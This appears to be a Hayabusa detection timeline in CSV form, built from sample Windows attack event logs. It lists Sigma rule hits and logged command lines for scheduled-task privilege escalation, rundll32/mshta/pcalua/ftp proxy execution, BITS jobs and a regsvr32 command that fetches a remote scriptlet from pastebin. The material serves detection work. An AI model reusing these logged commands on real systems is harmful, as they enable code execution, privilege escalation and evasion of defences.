2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.227 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\elevator | Process: C:\Windows\system32\svchost.exe | PID: 972 | PGUID: 365ABB72-5DEA-5CD7-0000-001077D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:35.258 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3752 | PGUID: 365ABB72-69A3-5CD7-0000-0010306F2200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:35.352 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1860 | PGUID: 365ABB72-69A3-5CD7-0000-00109D7F2200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:40.342 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3792 | PGUID: 365ABB72-69A8-5CD7-0000-0010C0982200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 21:52:43.702 +09:00,IEWIN7,7045,info,,New Service Installed,Name: WinPwnage | Path: %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/System_7045_namedpipe_privesc.evtx
2019-05-12 22:30:32.931 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x13a10 | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.181 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\ieframe.url | Process: c:\python27\python.exe | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.400 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | LID: 0x13a10 | PID: 2960 | PGUID: 365ABB72-2006-5CD8-0000-0010A2862300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:30:46.556 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | LID: 0x13a10 | PID: 2936 | PGUID: 365ABB72-2006-5CD8-0000-0010E0912300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:32:58.167 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3560 | PGUID: 365ABB72-208A-5CD8-0000-0010119B2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:37.078 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1844 | PGUID: 365ABB72-20B1-5CD8-0000-001064D62400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:59.743 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1416 | PGUID: 365ABB72-20C7-5CD8-0000-001021022500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:37:49.604 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\calc.hta | Process: C:\Windows\Explorer.EXE | PID: 2940 | PGUID: 365ABB72-15B9-5CD8-0000-00103CEB0600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.523 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3856 | PGUID: 365ABB72-21B8-5CD8-0000-0010BADE2600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta | LID: 0x13a10 | PID: 2964 | PGUID: 365ABB72-21B8-5CD8-0000-0010E4E82600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:38:01.383 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" | LID: 0x13a10 | PID: 704 | PGUID: 365ABB72-21B9-5CD8-0000-0010FC002700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx
2019-05-12 22:55:56.626 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.329 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\shdocvw.url | Process: c:\python27\python.exe | PID: 684 | PGUID: 365ABB72-25EC-5CD8-0000-0010CB0A1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.652 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2168 | PGUID: 365ABB72-25FC-5CD8-0000-0010906A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:46.573 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\inf\WmiApRpl\0009\WmiApRpl.ini | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:56:46.605 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\PerfStringBackup.INI | Process: \\?\C:\Windows\system32\wbem\WMIADAP.EXE | PID: 1512 | PGUID: 365ABB72-2615-5CD8-0000-001075171500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:57:39.662 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MpIdleTask | Process: C:\Windows\system32\svchost.exe | PID: 968 | PGUID: 365ABB72-2522-5CD8-0000-001080D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx
2019-05-12 22:58:39.850 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 1256 | PGUID: 365ABB72-268F-5CD8-0000-0010F4A51700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 22:58:54.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe | LID: 0x1364c | PID: 2728 | PGUID: 365ABB72-269E-5CD8-0000-001084F81A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx
2019-05-12 23:18:03.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1364c | PID: 3320 | PGUID: 365ABB72-2B1B-5CD8-0000-0010CCC92500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-12 23:18:09.589 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1364c | PID: 816 | PGUID: 365ABB72-2B21-5CD8-0000-001039DD2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx
2019-05-13 02:01:43.391 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 3788 | PGUID: 365ABB72-516B-5CD8-0000-001087E41600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:50.781 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | Process: C:\Windows\System32\pcalua.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 2952 | PGUID: 365ABB72-517E-5CD8-0000-001024D61700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:51.007 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 2920 | PGUID: 365ABB72-517E-5CD8-0000-00105FE01700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 1528 | PGUID: 365ABB72-532E-5CD8-0000-00106C222700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/proc_creation_win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
2019-05-13 02:20:01.980 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 4092 | PGUID: 
365ABB72-55C1-5CD8-0000-0010970D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx 2019-05-13 02:20:31.183 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 956 | PGUID: 365ABB72-55DF-5CD8-0000-001018532F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx 2019-05-13 02:20:49.443 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt | LID: 0x135f2 | PID: 2392 | PGUID: 365ABB72-55F1-5CD8-0000-0010781C3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx 2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Exec | Evas,Suspicious ftp.exe,,rules/sigma/process_creation/proc_creation_win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx 2019-05-13 02:20:49.458 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\system32\calc.exe | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 684 | PGUID: 365ABB72-55F1-5CD8-0000-00103D1E3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx 2019-05-13 03:04:50.121 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: backdoor | URL: 
C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx 2019-05-13 03:35:05.155 +09:00,IEWIN7,1,info,,Process Created,"Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13eee | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:35:05.780 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | LID: 0x13eee | PID: 1912 | PGUID: 365ABB72-6759-5CD8-0000-001085031000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:35:06.562 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49165 (IEWIN7..home) | Dst: 104.20.208.21:80 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 1420 | PGUID: 
365ABB72-6759-5CD8-0000-0010E2D50F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx 2019-05-13 03:48:52.219 +09:00,IEWIN7,1,info,,Process Created,"Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | Process: C:\ProgramData\jabber.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13715 | PID: 1340 | PGUID: 365ABB72-6A94-5CD8-0000-00101BDB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx 2019-05-13 03:48:52.766 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | LID: 0x13715 | PID: 3880 | PGUID: 365ABB72-6A94-5CD8-0000-0010C2F10E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx 2019-05-13 23:50:59.389 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: hola | URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx 2019-05-14 03:02:49.160 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mobsync.exe -Embedding | Process: C:\Windows\System32\mobsync.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1341d | PID: 3828 | PGUID: 
